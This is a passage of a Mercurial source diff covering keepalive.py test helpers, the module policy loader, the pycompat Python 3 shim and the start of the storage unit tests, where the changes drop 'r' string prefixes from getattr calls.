727 727 urlreq.installopener(opener)
728 728
729 729 fo = urlreq.urlopen(url)
730 730 foo = fo.read()
731 731 fo.close()
732 732 m = md5(foo)
733 733 print(format % (b'keepalive read', node.hex(m.digest())))
734 734
735 735 fo = urlreq.urlopen(url)
736 736 foo = b''
737 737 while True:
738 738 f = fo.readline()
739 739 if f:
740 740 foo = foo + f
741 741 else:
742 742 break
743 743 fo.close()
744 744 m = md5(foo)
745 745 print(format % (b'keepalive readline', node.hex(m.digest())))
746 746
747 747
748 748 def comp(N, url):
749 749 print(b' making %i connections to:\n %s' % (N, url))
750 750
751 751 procutil.stdout.write(b' first using the normal urllib handlers')
752 752 # first use normal opener
753 753 opener = urlreq.buildopener()
754 754 urlreq.installopener(opener)
755 755 t1 = fetch(N, url)
756 756 print(b' TIME: %.3f s' % t1)
757 757
758 758 procutil.stdout.write(b' now using the keepalive handler ')
759 759 # now install the keepalive handler and try again
760 760 opener = urlreq.buildopener(HTTPHandler())
761 761 urlreq.installopener(opener)
762 762 t2 = fetch(N, url)
763 763 print(b' TIME: %.3f s' % t2)
764 764 print(b' improvement factor: %.2f' % (t1 / t2))
765 765
766 766
767 767 def fetch(N, url, delay=0):
768 768 import time
769 769
770 770 lens = []
771 771 starttime = time.time()
772 772 for i in range(N):
773 773 if delay and i > 0:
774 774 time.sleep(delay)
775 775 fo = urlreq.urlopen(url)
776 776 foo = fo.read()
777 777 fo.close()
778 778 lens.append(len(foo))
779 779 diff = time.time() - starttime
780 780
781 781 j = 0
782 782 for i in lens[1:]:
783 783 j = j + 1
784 784 if not i == lens[0]:
785 785 print(b"WARNING: inconsistent length on read %i: %i" % (j, i))
786 786
787 787 return diff
788 788
789 789
790 790 def test_timeout(url):
791 791 global DEBUG
792 792 dbbackup = DEBUG
793 793
794 794 class FakeLogger(object):
795 795 def debug(self, msg, *args):
796 796 print(msg % args)
797 797
798 798 info = warning = error = debug
799 799
800 800 DEBUG = FakeLogger()
801 801 print(b" fetching the file to establish a connection")
802 802 fo = urlreq.urlopen(url)
803 803 data1 = fo.read()
804 804 fo.close()
805 805
806 806 i = 20
807 807 print(b" waiting %i seconds for the server to close the connection" % i)
808 808 while i > 0:
809 809 procutil.stdout.write(b'\r %2i' % i)
810 810 procutil.stdout.flush()
811 811 time.sleep(1)
812 812 i -= 1
813 813 procutil.stderr.write(b'\r')
814 814
815 815 print(b" fetching the file a second time")
816 816 fo = urlreq.urlopen(url)
817 817 data2 = fo.read()
818 818 fo.close()
819 819
820 820 if data1 == data2:
821 821 print(b' data are identical')
822 822 else:
823 823 print(b' ERROR: DATA DIFFER')
824 824
825 825 DEBUG = dbbackup
826 826
827 827
828 828 def test(url, N=10):
829 829 print(b"performing continuity test (making sure stuff isn't corrupted)")
830 830 continuity(url)
831 831 print(b'')
832 832 print(b"performing speed comparison")
833 833 comp(N, url)
834 834 print(b'')
835 835 print(b"performing dropped-connection check")
836 836 test_timeout(url)
837 837
838 838
839 839 if __name__ == '__main__':
840 840 import time
841 841
842 842 try:
843 843 N = int(sys.argv[1])
844 844 url = sys.argv[2]
845 845 except (IndexError, ValueError):
846 846 print(b"%s <integer> <url>" % sys.argv[0])
847 847 else:
848 848 test(url, N)
@@ -1,157 +1,157
1 1 # policy.py - module policy logic for Mercurial.
2 2 #
3 3 # Copyright 2015 Gregory Szorc <gregory.szorc@gmail.com>
4 4 #
5 5 # This software may be used and distributed according to the terms of the
6 6 # GNU General Public License version 2 or any later version.
7 7
8 8 from __future__ import absolute_import
9 9
10 10 import os
11 11 import sys
12 12
13 13 from .pycompat import getattr
14 14
15 15 # Rules for how modules can be loaded. Values are:
16 16 #
17 17 # c - require C extensions
18 18 # rust+c - require Rust and C extensions
19 19 # rust+c-allow - allow Rust and C extensions with fallback to pure Python
20 20 # for each
21 21 # allow - allow pure Python implementation when C loading fails
22 22 # cffi - required cffi versions (implemented within pure module)
23 23 # cffi-allow - allow pure Python implementation if cffi version is missing
24 24 # py - only load pure Python modules
25 25 #
26 26 # By default, fall back to the pure modules so the in-place build can
27 27 # run without recompiling the C extensions. This will be overridden by
28 28 # __modulepolicy__ generated by setup.py.
29 29 policy = b'allow'
30 30 _packageprefs = {
31 31 # policy: (versioned package, pure package)
32 32 b'c': (r'cext', None),
33 33 b'allow': (r'cext', r'pure'),
34 34 b'cffi': (r'cffi', None),
35 35 b'cffi-allow': (r'cffi', r'pure'),
36 36 b'py': (None, r'pure'),
37 37 # For now, rust policies impact importrust only
38 38 b'rust+c': (r'cext', None),
39 39 b'rust+c-allow': (r'cext', r'pure'),
40 40 }
41 41
42 42 try:
43 43 from . import __modulepolicy__
44 44
45 45 policy = __modulepolicy__.modulepolicy
46 46 except ImportError:
47 47 pass
48 48
49 49 # PyPy doesn't load C extensions.
50 50 #
51 51 # The canonical way to do this is to test platform.python_implementation().
52 52 # But we don't import platform and don't bloat for it here.
53 53 if r'__pypy__' in sys.builtin_module_names:
54 54 policy = b'cffi'
55 55
56 56 # Environment variable can always force settings.
57 57 if sys.version_info[0] >= 3:
58 58 if r'HGMODULEPOLICY' in os.environ:
59 59 policy = os.environ[r'HGMODULEPOLICY'].encode(r'utf-8')
60 60 else:
61 61 policy = os.environ.get(r'HGMODULEPOLICY', policy)
62 62
63 63
64 64 def _importfrom(pkgname, modname):
65 65 # from .<pkgname> import <modname> (where . is looked through this module)
66 66 fakelocals = {}
67 67 pkg = __import__(pkgname, globals(), fakelocals, [modname], level=1)
68 68 try:
69 69 fakelocals[modname] = mod = getattr(pkg, modname)
70 70 except AttributeError:
71 71 raise ImportError(r'cannot import name %s' % modname)
72 72 # force import; fakelocals[modname] may be replaced with the real module
73 getattr(mod, r'__doc__', None)
73 getattr(mod, '__doc__', None)
74 74 return fakelocals[modname]
75 75
76 76
77 77 # keep in sync with "version" in C modules
78 78 _cextversions = {
79 79 (r'cext', r'base85'): 1,
80 80 (r'cext', r'bdiff'): 3,
81 81 (r'cext', r'mpatch'): 1,
82 82 (r'cext', r'osutil'): 4,
83 83 (r'cext', r'parsers'): 13,
84 84 }
85 85
86 86 # map import request to other package or module
87 87 _modredirects = {
88 88 (r'cext', r'charencode'): (r'cext', r'parsers'),
89 89 (r'cffi', r'base85'): (r'pure', r'base85'),
90 90 (r'cffi', r'charencode'): (r'pure', r'charencode'),
91 91 (r'cffi', r'parsers'): (r'pure', r'parsers'),
92 92 }
93 93
94 94
95 95 def _checkmod(pkgname, modname, mod):
96 96 expected = _cextversions.get((pkgname, modname))
97 actual = getattr(mod, r'version', None)
97 actual = getattr(mod, 'version', None)
98 98 if actual != expected:
99 99 raise ImportError(
100 100 r'cannot import module %s.%s '
101 101 r'(expected version: %d, actual: %r)'
102 102 % (pkgname, modname, expected, actual)
103 103 )
104 104
105 105
106 106 def importmod(modname):
107 107 """Import module according to policy and check API version"""
108 108 try:
109 109 verpkg, purepkg = _packageprefs[policy]
110 110 except KeyError:
111 111 raise ImportError(r'invalid HGMODULEPOLICY %r' % policy)
112 112 assert verpkg or purepkg
113 113 if verpkg:
114 114 pn, mn = _modredirects.get((verpkg, modname), (verpkg, modname))
115 115 try:
116 116 mod = _importfrom(pn, mn)
117 117 if pn == verpkg:
118 118 _checkmod(pn, mn, mod)
119 119 return mod
120 120 except ImportError:
121 121 if not purepkg:
122 122 raise
123 123 pn, mn = _modredirects.get((purepkg, modname), (purepkg, modname))
124 124 return _importfrom(pn, mn)
125 125
126 126
127 127 def _isrustpermissive():
128 128 """Assuming the policy is a Rust one, tell if it's permissive."""
129 129 return policy.endswith(b'-allow')
130 130
131 131
132 132 def importrust(modname, member=None, default=None):
133 133 """Import Rust module according to policy and availability.
134 134
135 135 If policy isn't a Rust one, this returns `default`.
136 136
137 137 If either the module or its member is not available, this returns `default`
138 138 if policy is permissive and raises `ImportError` if not.
139 139 """
140 140 if not policy.startswith(b'rust'):
141 141 return default
142 142
143 143 try:
144 144 mod = _importfrom(r'rustext', modname)
145 145 except ImportError:
146 146 if _isrustpermissive():
147 147 return default
148 148 raise
149 149 if member is None:
150 150 return mod
151 151
152 152 try:
153 153 return getattr(mod, member)
154 154 except AttributeError:
155 155 if _isrustpermissive():
156 156 return default
157 157 raise ImportError(r"Cannot import name %s" % member)
@@ -1,450 +1,450
1 1 # pycompat.py - portability shim for python 3
2 2 #
3 3 # This software may be used and distributed according to the terms of the
4 4 # GNU General Public License version 2 or any later version.
5 5
6 6 """Mercurial portability shim for python 3.
7 7
8 8 This contains aliases to hide python version-specific details from the core.
9 9 """
10 10
11 11 from __future__ import absolute_import
12 12
13 13 import getopt
14 14 import inspect
15 15 import os
16 16 import shlex
17 17 import sys
18 18 import tempfile
19 19
20 20 ispy3 = sys.version_info[0] >= 3
21 21 ispypy = r'__pypy__' in sys.builtin_module_names
22 22
23 23 if not ispy3:
24 24 import cookielib
25 25 import cPickle as pickle
26 26 import httplib
27 27 import Queue as queue
28 28 import SocketServer as socketserver
29 29 import xmlrpclib
30 30
31 31 from .thirdparty.concurrent import futures
32 32
33 33 def future_set_exception_info(f, exc_info):
34 34 f.set_exception_info(*exc_info)
35 35
36 36
37 37 else:
38 38 import concurrent.futures as futures
39 39 import http.cookiejar as cookielib
40 40 import http.client as httplib
41 41 import pickle
42 42 import queue as queue
43 43 import socketserver
44 44 import xmlrpc.client as xmlrpclib
45 45
46 46 def future_set_exception_info(f, exc_info):
47 47 f.set_exception(exc_info[0])
48 48
49 49
50 50 def identity(a):
51 51 return a
52 52
53 53
54 54 def _rapply(f, xs):
55 55 if xs is None:
56 56 # assume None means non-value of optional data
57 57 return xs
58 58 if isinstance(xs, (list, set, tuple)):
59 59 return type(xs)(_rapply(f, x) for x in xs)
60 60 if isinstance(xs, dict):
61 61 return type(xs)((_rapply(f, k), _rapply(f, v)) for k, v in xs.items())
62 62 return f(xs)
63 63
64 64
65 65 def rapply(f, xs):
66 66 """Apply function recursively to every item preserving the data structure
67 67
68 68 >>> def f(x):
69 69 ... return 'f(%s)' % x
70 70 >>> rapply(f, None) is None
71 71 True
72 72 >>> rapply(f, 'a')
73 73 'f(a)'
74 74 >>> rapply(f, {'a'}) == {'f(a)'}
75 75 True
76 76 >>> rapply(f, ['a', 'b', None, {'c': 'd'}, []])
77 77 ['f(a)', 'f(b)', None, {'f(c)': 'f(d)'}, []]
78 78
79 79 >>> xs = [object()]
80 80 >>> rapply(identity, xs) is xs
81 81 True
82 82 """
83 83 if f is identity:
84 84 # fast path mainly for py2
85 85 return xs
86 86 return _rapply(f, xs)
87 87
88 88
89 89 if ispy3:
90 90 import builtins
91 91 import functools
92 92 import io
93 93 import struct
94 94
95 95 fsencode = os.fsencode
96 96 fsdecode = os.fsdecode
97 97 oscurdir = os.curdir.encode('ascii')
98 98 oslinesep = os.linesep.encode('ascii')
99 99 osname = os.name.encode('ascii')
100 100 ospathsep = os.pathsep.encode('ascii')
101 101 ospardir = os.pardir.encode('ascii')
102 102 ossep = os.sep.encode('ascii')
103 103 osaltsep = os.altsep
104 104 if osaltsep:
105 105 osaltsep = osaltsep.encode('ascii')
106 106
107 107 sysplatform = sys.platform.encode('ascii')
108 108 sysexecutable = sys.executable
109 109 if sysexecutable:
110 110 sysexecutable = os.fsencode(sysexecutable)
111 111 bytesio = io.BytesIO
112 112 # TODO deprecate stringio name, as it is a lie on Python 3.
113 113 stringio = bytesio
114 114
115 115 def maplist(*args):
116 116 return list(map(*args))
117 117
118 118 def rangelist(*args):
119 119 return list(range(*args))
120 120
121 121 def ziplist(*args):
122 122 return list(zip(*args))
123 123
124 124 rawinput = input
125 125 getargspec = inspect.getfullargspec
126 126
127 127 long = int
128 128
129 129 # TODO: .buffer might not exist if std streams were replaced; we'll need
130 130 # a silly wrapper to make a bytes stream backed by a unicode one.
131 131 stdin = sys.stdin.buffer
132 132 stdout = sys.stdout.buffer
133 133 stderr = sys.stderr.buffer
134 134
135 135 # Since Python 3 converts argv to wchar_t type by Py_DecodeLocale() on Unix,
136 136 # we can use os.fsencode() to get back bytes argv.
137 137 #
138 138 # https://hg.python.org/cpython/file/v3.5.1/Programs/python.c#l55
139 139 #
140 140 # TODO: On Windows, the native argv is wchar_t, so we'll need a different
141 141 # workaround to simulate the Python 2 (i.e. ANSI Win32 API) behavior.
142 142 if getattr(sys, 'argv', None) is not None:
143 143 sysargv = list(map(os.fsencode, sys.argv))
144 144
145 145 bytechr = struct.Struct(r'>B').pack
146 146 byterepr = b'%r'.__mod__
147 147
148 148 class bytestr(bytes):
149 149 """A bytes which mostly acts as a Python 2 str
150 150
151 151 >>> bytestr(), bytestr(bytearray(b'foo')), bytestr(u'ascii'), bytestr(1)
152 152 ('', 'foo', 'ascii', '1')
153 153 >>> s = bytestr(b'foo')
154 154 >>> assert s is bytestr(s)
155 155
156 156 __bytes__() should be called if provided:
157 157
158 158 >>> class bytesable(object):
159 159 ... def __bytes__(self):
160 160 ... return b'bytes'
161 161 >>> bytestr(bytesable())
162 162 'bytes'
163 163
164 164 There's no implicit conversion from non-ascii str as its encoding is
165 165 unknown:
166 166
167 167 >>> bytestr(chr(0x80)) # doctest: +ELLIPSIS
168 168 Traceback (most recent call last):
169 169 ...
170 170 UnicodeEncodeError: ...
171 171
172 172 Comparison between bytestr and bytes should work:
173 173
174 174 >>> assert bytestr(b'foo') == b'foo'
175 175 >>> assert b'foo' == bytestr(b'foo')
176 176 >>> assert b'f' in bytestr(b'foo')
177 177 >>> assert bytestr(b'f') in b'foo'
178 178
179 179 Sliced elements should be bytes, not integer:
180 180
181 181 >>> s[1], s[:2]
182 182 (b'o', b'fo')
183 183 >>> list(s), list(reversed(s))
184 184 ([b'f', b'o', b'o'], [b'o', b'o', b'f'])
185 185
186 186 As bytestr type isn't propagated across operations, you need to cast
187 187 bytes to bytestr explicitly:
188 188
189 189 >>> s = bytestr(b'foo').upper()
190 190 >>> t = bytestr(s)
191 191 >>> s[0], t[0]
192 192 (70, b'F')
193 193
194 194 Be careful to not pass a bytestr object to a function which expects
195 195 bytearray-like behavior.
196 196
197 197 >>> t = bytes(t) # cast to bytes
198 198 >>> assert type(t) is bytes
199 199 """
200 200
201 201 def __new__(cls, s=b''):
202 202 if isinstance(s, bytestr):
203 203 return s
204 204 if not isinstance(
205 205 s, (bytes, bytearray)
206 206 ) and not hasattr( # hasattr-py3-only
207 207 s, u'__bytes__'
208 208 ):
209 209 s = str(s).encode('ascii')
210 210 return bytes.__new__(cls, s)
211 211
212 212 def __getitem__(self, key):
213 213 s = bytes.__getitem__(self, key)
214 214 if not isinstance(s, bytes):
215 215 s = bytechr(s)
216 216 return s
217 217
218 218 def __iter__(self):
219 219 return iterbytestr(bytes.__iter__(self))
220 220
221 221 def __repr__(self):
222 222 return bytes.__repr__(self)[1:] # drop b''
223 223
224 224 def iterbytestr(s):
225 225 """Iterate bytes as if it were a str object of Python 2"""
226 226 return map(bytechr, s)
227 227
228 228 def maybebytestr(s):
229 229 """Promote bytes to bytestr"""
230 230 if isinstance(s, bytes):
231 231 return bytestr(s)
232 232 return s
233 233
234 234 def sysbytes(s):
235 235 """Convert an internal str (e.g. keyword, __doc__) back to bytes
236 236
237 237 This never raises UnicodeEncodeError, but only ASCII characters
238 238 can be round-trip by sysstr(sysbytes(s)).
239 239 """
240 240 return s.encode('utf-8')
241 241
242 242 def sysstr(s):
243 243 """Return a keyword str to be passed to Python functions such as
244 244 getattr() and str.encode()
245 245
246 246 This never raises UnicodeDecodeError. Non-ascii characters are
247 247 considered invalid and mapped to arbitrary but unique code points
248 248 such that 'sysstr(a) != sysstr(b)' for all 'a != b'.
249 249 """
250 250 if isinstance(s, builtins.str):
251 251 return s
252 252 return s.decode('latin-1')
253 253
254 254 def strurl(url):
255 255 """Converts a bytes url back to str"""
256 256 if isinstance(url, bytes):
257 257 return url.decode('ascii')
258 258 return url
259 259
260 260 def bytesurl(url):
261 261 """Converts a str url to bytes by encoding in ascii"""
262 262 if isinstance(url, str):
263 263 return url.encode('ascii')
264 264 return url
265 265
266 266 def raisewithtb(exc, tb):
267 267 """Raise exception with the given traceback"""
268 268 raise exc.with_traceback(tb)
269 269
270 270 def getdoc(obj):
271 271 """Get docstring as bytes; may be None so gettext() won't confuse it
272 272 with _('')"""
273 doc = getattr(obj, u'__doc__', None)
273 doc = getattr(obj, '__doc__', None)
274 274 if doc is None:
275 275 return doc
276 276 return sysbytes(doc)
277 277
278 278 def _wrapattrfunc(f):
279 279 @functools.wraps(f)
280 280 def w(object, name, *args):
281 281 return f(object, sysstr(name), *args)
282 282
283 283 return w
284 284
285 285 # these wrappers are automagically imported by hgloader
286 286 delattr = _wrapattrfunc(builtins.delattr)
287 287 getattr = _wrapattrfunc(builtins.getattr)
288 288 hasattr = _wrapattrfunc(builtins.hasattr)
289 289 setattr = _wrapattrfunc(builtins.setattr)
290 290 xrange = builtins.range
291 291 unicode = str
292 292
293 293 def open(name, mode=b'r', buffering=-1, encoding=None):
294 294 return builtins.open(name, sysstr(mode), buffering, encoding)
295 295
296 296 safehasattr = _wrapattrfunc(builtins.hasattr)
297 297
298 298 def _getoptbwrapper(orig, args, shortlist, namelist):
299 299 """
300 300 Takes bytes arguments, converts them to unicode, pass them to
301 301 getopt.getopt(), convert the returned values back to bytes and then
302 302 return them for Python 3 compatibility as getopt.getopt() don't accepts
303 303 bytes on Python 3.
304 304 """
305 305 args = [a.decode('latin-1') for a in args]
306 306 shortlist = shortlist.decode('latin-1')
307 307 namelist = [a.decode('latin-1') for a in namelist]
308 308 opts, args = orig(args, shortlist, namelist)
309 309 opts = [(a[0].encode('latin-1'), a[1].encode('latin-1')) for a in opts]
310 310 args = [a.encode('latin-1') for a in args]
311 311 return opts, args
312 312
313 313 def strkwargs(dic):
314 314 """
315 315 Converts the keys of a python dictonary to str i.e. unicodes so that
316 316 they can be passed as keyword arguments as dictonaries with bytes keys
317 317 can't be passed as keyword arguments to functions on Python 3.
318 318 """
319 319 dic = dict((k.decode('latin-1'), v) for k, v in dic.iteritems())
320 320 return dic
321 321
322 322 def byteskwargs(dic):
323 323 """
324 324 Converts keys of python dictonaries to bytes as they were converted to
325 325 str to pass that dictonary as a keyword argument on Python 3.
326 326 """
327 327 dic = dict((k.encode('latin-1'), v) for k, v in dic.iteritems())
328 328 return dic
329 329
330 330 # TODO: handle shlex.shlex().
331 331 def shlexsplit(s, comments=False, posix=True):
332 332 """
333 333 Takes bytes argument, convert it to str i.e. unicodes, pass that into
334 334 shlex.split(), convert the returned value to bytes and return that for
335 335 Python 3 compatibility as shelx.split() don't accept bytes on Python 3.
336 336 """
337 337 ret = shlex.split(s.decode('latin-1'), comments, posix)
338 338 return [a.encode('latin-1') for a in ret]
339 339
340 340
341 341 else:
342 342 import cStringIO
343 343
344 344 xrange = xrange
345 345 unicode = unicode
346 346 bytechr = chr
347 347 byterepr = repr
348 348 bytestr = str
349 349 iterbytestr = iter
350 350 maybebytestr = identity
351 351 sysbytes = identity
352 352 sysstr = identity
353 353 strurl = identity
354 354 bytesurl = identity
355 355 open = open
356 356 delattr = delattr
357 357 getattr = getattr
358 358 hasattr = hasattr
359 359 setattr = setattr
360 360
361 361 # this can't be parsed on Python 3
362 362 exec(b'def raisewithtb(exc, tb):\n' b' raise exc, None, tb\n')
363 363
364 364 def fsencode(filename):
365 365 """
366 366 Partial backport from os.py in Python 3, which only accepts bytes.
367 367 In Python 2, our paths should only ever be bytes, a unicode path
368 368 indicates a bug.
369 369 """
370 370 if isinstance(filename, str):
371 371 return filename
372 372 else:
373 373 raise TypeError(r"expect str, not %s" % type(filename).__name__)
374 374
375 375 # In Python 2, fsdecode() has a very chance to receive bytes. So it's
376 376 # better not to touch Python 2 part as it's already working fine.
377 377 fsdecode = identity
378 378
379 379 def getdoc(obj):
380 380 return getattr(obj, '__doc__', None)
381 381
382 382 _notset = object()
383 383
384 384 def safehasattr(thing, attr):
385 385 return getattr(thing, attr, _notset) is not _notset
386 386
387 387 def _getoptbwrapper(orig, args, shortlist, namelist):
388 388 return orig(args, shortlist, namelist)
389 389
390 390 strkwargs = identity
391 391 byteskwargs = identity
392 392
393 393 oscurdir = os.curdir
394 394 oslinesep = os.linesep
395 395 osname = os.name
396 396 ospathsep = os.pathsep
397 397 ospardir = os.pardir
398 398 ossep = os.sep
399 399 osaltsep = os.altsep
400 400 long = long
401 401 stdin = sys.stdin
402 402 stdout = sys.stdout
403 403 stderr = sys.stderr
404 404 if getattr(sys, 'argv', None) is not None:
405 405 sysargv = sys.argv
406 406 sysplatform = sys.platform
407 407 sysexecutable = sys.executable
408 408 shlexsplit = shlex.split
409 409 bytesio = cStringIO.StringIO
410 410 stringio = bytesio
411 411 maplist = map
412 412 rangelist = range
413 413 ziplist = zip
414 414 rawinput = raw_input
415 415 getargspec = inspect.getargspec
416 416
417 417 isjython = sysplatform.startswith(b'java')
418 418
419 419 isdarwin = sysplatform.startswith(b'darwin')
420 420 islinux = sysplatform.startswith(b'linux')
421 421 isposix = osname == b'posix'
422 422 iswindows = osname == b'nt'
423 423
424 424
425 425 def getoptb(args, shortlist, namelist):
426 426 return _getoptbwrapper(getopt.getopt, args, shortlist, namelist)
427 427
428 428
429 429 def gnugetoptb(args, shortlist, namelist):
430 430 return _getoptbwrapper(getopt.gnu_getopt, args, shortlist, namelist)
431 431
432 432
433 433 def mkdtemp(suffix=b'', prefix=b'tmp', dir=None):
434 434 return tempfile.mkdtemp(suffix, prefix, dir)
435 435
436 436
437 437 # text=True is not supported; use util.from/tonativeeol() instead
438 438 def mkstemp(suffix=b'', prefix=b'tmp', dir=None):
439 439 return tempfile.mkstemp(suffix, prefix, dir)
440 440
441 441
442 442 # mode must include 'b'ytes as encoding= is not supported
443 443 def namedtempfile(
444 444 mode=b'w+b', bufsize=-1, suffix=b'', prefix=b'tmp', dir=None, delete=True
445 445 ):
446 446 mode = sysstr(mode)
447 447 assert r'b' in mode
448 448 return tempfile.NamedTemporaryFile(
449 449 mode, bufsize, suffix=suffix, prefix=prefix, dir=dir, delete=delete
450 450 )
@@ -1,1391 +1,1391
1 1 # storage.py - Testing of storage primitives.
2 2 #
3 3 # Copyright 2018 Gregory Szorc <gregory.szorc@gmail.com>
4 4 #
5 5 # This software may be used and distributed according to the terms of the
6 6 # GNU General Public License version 2 or any later version.
7 7
8 8 from __future__ import absolute_import
9 9
10 10 import unittest
11 11
12 12 from ..node import (
13 13 hex,
14 14 nullid,
15 15 nullrev,
16 16 )
17 17 from ..pycompat import getattr
18 18 from .. import (
19 19 error,
20 20 mdiff,
21 21 )
22 22 from ..interfaces import repository
23 23 from ..utils import storageutil
24 24
25 25
26 26 class basetestcase(unittest.TestCase):
27 if not getattr(unittest.TestCase, r'assertRaisesRegex', False):
27 if not getattr(unittest.TestCase, 'assertRaisesRegex', False):
28 28 assertRaisesRegex = ( # camelcase-required
29 29 unittest.TestCase.assertRaisesRegexp
30 30 )
31 31
32 32
33 33 class ifileindextests(basetestcase):
34 34 """Generic tests for the ifileindex interface.
35 35
36 36 All file storage backends for index data should conform to the tests in this
37 37 class.
38 38
39 39 Use ``makeifileindextests()`` to create an instance of this type.
40 40 """
41 41
42 42 def testempty(self):
43 43 f = self._makefilefn()
44 44 self.assertEqual(len(f), 0, b'new file store has 0 length by default')
45 45 self.assertEqual(list(f), [], b'iter yields nothing by default')
46 46
47 47 gen = iter(f)
48 48 with self.assertRaises(StopIteration):
49 49 next(gen)
50 50
51 51 self.assertFalse(f.hasnode(None))
52 52 self.assertFalse(f.hasnode(0))
53 53 self.assertFalse(f.hasnode(nullrev))
54 54 self.assertFalse(f.hasnode(nullid))
55 55 self.assertFalse(f.hasnode(b'0'))
56 56 self.assertFalse(f.hasnode(b'a' * 20))
57 57
58 58 # revs() should evaluate to an empty list.
59 59 self.assertEqual(list(f.revs()), [])
60 60
61 61 revs = iter(f.revs())
62 62 with self.assertRaises(StopIteration):
63 63 next(revs)
64 64
65 65 self.assertEqual(list(f.revs(start=20)), [])
66 66
67 67 # parents() and parentrevs() work with nullid/nullrev.
68 68 self.assertEqual(f.parents(nullid), (nullid, nullid))
69 69 self.assertEqual(f.parentrevs(nullrev), (nullrev, nullrev))
70 70
71 71 with self.assertRaises(error.LookupError):
72 72 f.parents(b'\x01' * 20)
73 73
74 74 for i in range(-5, 5):
75 75 if i == nullrev:
76 76 continue
77 77
78 78 with self.assertRaises(IndexError):
79 79 f.parentrevs(i)
80 80
81 81 # nullid/nullrev lookup always works.
82 82 self.assertEqual(f.rev(nullid), nullrev)
83 83 self.assertEqual(f.node(nullrev), nullid)
84 84
85 85 with self.assertRaises(error.LookupError):
86 86 f.rev(b'\x01' * 20)
87 87
88 88 for i in range(-5, 5):
89 89 if i == nullrev:
90 90 continue
91 91
92 92 with self.assertRaises(IndexError):
93 93 f.node(i)
94 94
95 95 self.assertEqual(f.lookup(nullid), nullid)
96 96 self.assertEqual(f.lookup(nullrev), nullid)
97 97 self.assertEqual(f.lookup(hex(nullid)), nullid)
98 98 self.assertEqual(f.lookup(b'%d' % nullrev), nullid)
99 99
100 100 with self.assertRaises(error.LookupError):
101 101 f.lookup(b'badvalue')
102 102
103 103 with self.assertRaises(error.LookupError):
104 104 f.lookup(hex(nullid)[0:12])
105 105
106 106 with self.assertRaises(error.LookupError):
107 107 f.lookup(b'-2')
108 108
109 109 with self.assertRaises(error.LookupError):
110 110 f.lookup(b'0')
111 111
112 112 with self.assertRaises(error.LookupError):
113 113 f.lookup(b'1')
114 114
115 115 with self.assertRaises(error.LookupError):
116 116 f.lookup(b'11111111111111111111111111111111111111')
117 117
118 118 for i in range(-5, 5):
119 119 if i == nullrev:
120 120 continue
121 121
122 122 with self.assertRaises(LookupError):
123 123 f.lookup(i)
124 124
125 125 self.assertEqual(f.linkrev(nullrev), nullrev)
126 126
127 127 for i in range(-5, 5):
128 128 if i == nullrev:
129 129 continue
130 130
131 131 with self.assertRaises(IndexError):
132 132 f.linkrev(i)
133 133
134 134 self.assertFalse(f.iscensored(nullrev))
135 135
136 136 for i in range(-5, 5):
137 137 if i == nullrev:
138 138 continue
139 139
140 140 with self.assertRaises(IndexError):
141 141 f.iscensored(i)
142 142
143 143 self.assertEqual(list(f.commonancestorsheads(nullid, nullid)), [])
144 144
145 145 with self.assertRaises(ValueError):
146 146 self.assertEqual(list(f.descendants([])), [])
147 147
148 148 self.assertEqual(list(f.descendants([nullrev])), [])
149 149
150 150 self.assertEqual(f.heads(), [nullid])
151 151 self.assertEqual(f.heads(nullid), [nullid])
152 152 self.assertEqual(f.heads(None, [nullid]), [nullid])
153 153 self.assertEqual(f.heads(nullid, [nullid]), [nullid])
154 154
155 155 self.assertEqual(f.children(nullid), [])
156 156
157 157 with self.assertRaises(error.LookupError):
158 158 f.children(b'\x01' * 20)
159 159
160 160 def testsinglerevision(self):
161 161 f = self._makefilefn()
162 162 with self._maketransactionfn() as tr:
163 163 node = f.add(b'initial', None, tr, 0, nullid, nullid)
164 164
165 165 self.assertEqual(len(f), 1)
166 166 self.assertEqual(list(f), [0])
167 167
168 168 gen = iter(f)
169 169 self.assertEqual(next(gen), 0)
170 170
171 171 with self.assertRaises(StopIteration):
172 172 next(gen)
173 173
174 174 self.assertTrue(f.hasnode(node))
175 175 self.assertFalse(f.hasnode(hex(node)))
176 176 self.assertFalse(f.hasnode(nullrev))
177 177 self.assertFalse(f.hasnode(nullid))
178 178 self.assertFalse(f.hasnode(node[0:12]))
179 179 self.assertFalse(f.hasnode(hex(node)[0:20]))
180 180
181 181 self.assertEqual(list(f.revs()), [0])
182 182 self.assertEqual(list(f.revs(start=1)), [])
183 183 self.assertEqual(list(f.revs(start=0)), [0])
184 184 self.assertEqual(list(f.revs(stop=0)), [0])
185 185 self.assertEqual(list(f.revs(stop=1)), [0])
186 186 self.assertEqual(list(f.revs(1, 1)), [])
187 187 # TODO buggy
188 188 self.assertEqual(list(f.revs(1, 0)), [1, 0])
189 189 self.assertEqual(list(f.revs(2, 0)), [2, 1, 0])
190 190
191 191 self.assertEqual(f.parents(node), (nullid, nullid))
192 192 self.assertEqual(f.parentrevs(0), (nullrev, nullrev))
193 193
194 194 with self.assertRaises(error.LookupError):
195 195 f.parents(b'\x01' * 20)
196 196
197 197 with self.assertRaises(IndexError):
198 198 f.parentrevs(1)
199 199
200 200 self.assertEqual(f.rev(node), 0)
201 201
202 202 with self.assertRaises(error.LookupError):
203 203 f.rev(b'\x01' * 20)
204 204
205 205 self.assertEqual(f.node(0), node)
206 206
207 207 with self.assertRaises(IndexError):
208 208 f.node(1)
209 209
210 210 self.assertEqual(f.lookup(node), node)
211 211 self.assertEqual(f.lookup(0), node)
212 212 self.assertEqual(f.lookup(-1), nullid)
213 213 self.assertEqual(f.lookup(b'0'), node)
214 214 self.assertEqual(f.lookup(hex(node)), node)
215 215
216 216 with self.assertRaises(error.LookupError):
217 217 f.lookup(hex(node)[0:12])
218 218
219 219 with self.assertRaises(error.LookupError):
220 220 f.lookup(-2)
221 221
222 222 with self.assertRaises(error.LookupError):
223 223 f.lookup(b'-2')
224 224
225 225 with self.assertRaises(error.LookupError):
226 226 f.lookup(1)
227 227
228 228 with self.assertRaises(error.LookupError):
229 229 f.lookup(b'1')
230 230
231 231 self.assertEqual(f.linkrev(0), 0)
232 232
233 233 with self.assertRaises(IndexError):
234 234 f.linkrev(1)
235 235
236 236 self.assertFalse(f.iscensored(0))
237 237
238 238 with self.assertRaises(IndexError):
239 239 f.iscensored(1)
240 240
241 241 self.assertEqual(list(f.descendants([0])), [])
242 242
243 243 self.assertEqual(f.heads(), [node])
244 244 self.assertEqual(f.heads(node), [node])
245 245 self.assertEqual(f.heads(stop=[node]), [node])
246 246
247 247 with self.assertRaises(error.LookupError):
248 248 f.heads(stop=[b'\x01' * 20])
249 249
250 250 self.assertEqual(f.children(node), [])
